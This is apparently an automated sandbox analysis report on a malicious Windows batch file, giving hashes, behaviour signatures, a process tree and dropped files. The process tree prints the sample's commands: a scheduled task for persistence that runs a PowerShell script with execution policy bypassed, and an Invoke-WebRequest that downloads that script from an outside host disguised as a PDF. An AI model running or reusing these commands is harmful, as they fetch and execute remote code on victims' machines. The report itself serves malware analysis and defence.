Analysis

  • max time kernel
    148s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    30-12-2024 05:29

General

  • Target

    10b20d5ab63333029b484bf4fc528e6cd4dc755c99c31c24054d63f9e3447c1c.bat

  • Size

    935B

  • MD5

    1c94a162524f1ab324eb20ab36123aa9

  • SHA1

    2d0bd3e465120d8161a30782724f6381130c3e6a

  • SHA256

    10b20d5ab63333029b484bf4fc528e6cd4dc755c99c31c24054d63f9e3447c1c

  • SHA512

    f4252f79627dcf11c7b378a51503651476a10b22638b2797f6d6d33ef268acb54a1a37b0d2ba18535c9354470490261fef88d6a9aae6fde57c8388e035c12d3a

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Powershell Invoke Web Request.

  • Drops file in System32 directory 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\10b20d5ab63333029b484bf4fc528e6cd4dc755c99c31c24054d63f9e3447c1c.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2312
    • C:\Windows\system32\schtasks.exe
      schtasks /create /tn "Octanagem" /tr "cmd /c start /min PowerShell -ex Bypass C:\Users\Public\American.ps1" /SC HOURLY /mo 6 /f
      2⤵
      • Scheduled Task/Job: Scheduled Task
      PID:2380
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Invoke-WebRequest -Uri 'https://hoteltoscanaplaza.com.co/cgi-bin/Atendimento.pdf' -OutFile 'C:\Users\Public\American.ps1'"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2816
    • C:\Windows\system32\schtasks.exe
      schtasks /run /tn "Octanagem"
      2⤵
        PID:2800
      • C:\Windows\system32\cmd.exe
        cmd /c start /min PowerShell -ex Bypass C:\Users\Public\American.ps1
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1948
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          PowerShell -ex Bypass C:\Users\Public\American.ps1
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2320
    • C:\Windows\system32\cmd.EXE
      C:\Windows\system32\cmd.EXE /c start /min PowerShell -ex Bypass C:\Users\Public\American.ps1
      1⤵
      • Suspicious use of WriteProcessMemory
      PID:4300
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        PowerShell -ex Bypass C:\Users\Public\American.ps1
        2⤵
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1104

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

      Filesize

      2KB

      MD5

      2f57fde6b33e89a63cf0dfdd6e60a351

      SHA1

      445bf1b07223a04f8a159581a3d37d630273010f

      SHA256

      3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

      SHA512

      42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      1KB

      MD5

      c69e5c86bb7bcac84492a5fb80b23e46

      SHA1

      ad0f323298a5cebcec98eef1a1069debfe1f7d7c

      SHA256

      32d2345faf8b9a6a95f023cf02b820b0a86d41eadf786e91752bc9d7bc40baf1

      SHA512

      18482a071fd00a337a499a4dd9d2db3783d77be209be57c92eb9edba3b8f68fffbc2a484be823d2d3708d2f7fe1ef8bf670e1856e2f394d72b2502ab3d8cbfb1

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      944B

      MD5

      f4cd59fec6cf54c85fc53e911914bf82

      SHA1

      50c1bf0969af6099d4b602a1d923a9b693a9b9ff

      SHA256

      70329406d55a7f671e2c30943772bfde19ceb53f7a402222aa0f74669f741f17

      SHA512

      5cfc2de8d95b1670570908c65389391f107d0f023f8a92412f001bb61982301e3405b692390c502b3f302df907fa1231cd056863cc9151dbbdb59c579858d5dc

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_n2utoozg.2i3.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

      Filesize

      6KB

      MD5

      dd61f1592f765c5fb94029070a9c2a79

      SHA1

      0065958d394da32708fcb53fadd64d648465a434

      SHA256

      2464b36db8cddad5789ae51528bec357c4ab49939117772e198f37b57b4764a6

      SHA512

      7ac01a504aa12f779e0f6ae290c9d28b91ef0c3c2a0e4310a682d7cde697cb6760e11819156b5c56c663308816dc61c4e421137d772db65b9aa7f1ec269c0c64

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

      Filesize

      6KB

      MD5

      623325d659d15c12fa0c71ec6bc97ea1

      SHA1

      4b29b6f206f7c2c4d61f3a09c67e5de76c4538c5

      SHA256

      b6dada66e9755379004d5429b0e36b39422ec451324cccecb371b9f7fe2f0c27

      SHA512

      a4c0099622b7d9933a5b885df9e5f29287161bc84d72cb10b679c49359b30897718aab92562679fe236815d8be8a647c2d42c8bbad1b1010e1a29ddb1505638a

    • memory/2816-11-0x00007FF976220000-0x00007FF976CE1000-memory.dmp

      Filesize

      10.8MB

    • memory/2816-18-0x00007FF976220000-0x00007FF976CE1000-memory.dmp

      Filesize

      10.8MB

    • memory/2816-19-0x00007FF976220000-0x00007FF976CE1000-memory.dmp

      Filesize

      10.8MB

    • memory/2816-15-0x00007FF976220000-0x00007FF976CE1000-memory.dmp

      Filesize

      10.8MB

    • memory/2816-13-0x000002739FCA0000-0x00000273A0446000-memory.dmp

      Filesize

      7.6MB

    • memory/2816-12-0x00007FF976220000-0x00007FF976CE1000-memory.dmp

      Filesize

      10.8MB

    • memory/2816-1-0x00000273863B0000-0x00000273863D2000-memory.dmp

      Filesize

      136KB

    • memory/2816-0-0x00007FF976223000-0x00007FF976225000-memory.dmp

      Filesize

      8KB